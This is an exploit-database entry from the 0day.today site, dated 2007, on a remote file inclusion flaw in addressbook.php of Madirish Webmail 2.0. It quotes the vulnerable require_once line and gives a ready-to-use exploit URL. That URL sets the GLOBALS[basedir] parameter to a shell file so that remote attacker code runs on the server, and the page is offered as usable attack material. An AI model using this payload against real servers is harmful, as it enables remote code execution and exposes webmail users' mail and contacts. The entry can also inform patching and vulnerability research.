[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln

Author
BoZKuRTSeRDaR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1931
Category
web applications
Date add
03-06-2007
Platform
unsorted
=================================================================
Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln
=================================================================



###########################################################

Madirish Webmail v2.0  Remote File Include Vulnerabilities

Author : BoZKuRTSeRDaR

script Download : http://sourceforge.net/projects/madirishwebmail

###############################################################################

code:
require_once($GLOBALS['basedir']."lib/sql.php")

exploit:

http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?


#  0day.today [2024-12-26]  #